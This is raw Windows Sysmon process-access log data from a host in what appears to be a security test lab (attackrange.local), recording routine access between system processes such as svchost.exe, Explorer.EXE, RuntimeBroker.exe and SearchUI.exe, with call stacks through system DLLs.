08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.663{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.478{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.441{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.441{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.394{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.379{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.379{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.379{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.294{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.294{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2285|C:\Windows\System32\SharedStartModel.dll+b2801|C:\Windows\system32\windows.cortana.Desktop.dll+a80e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001053875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.262{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 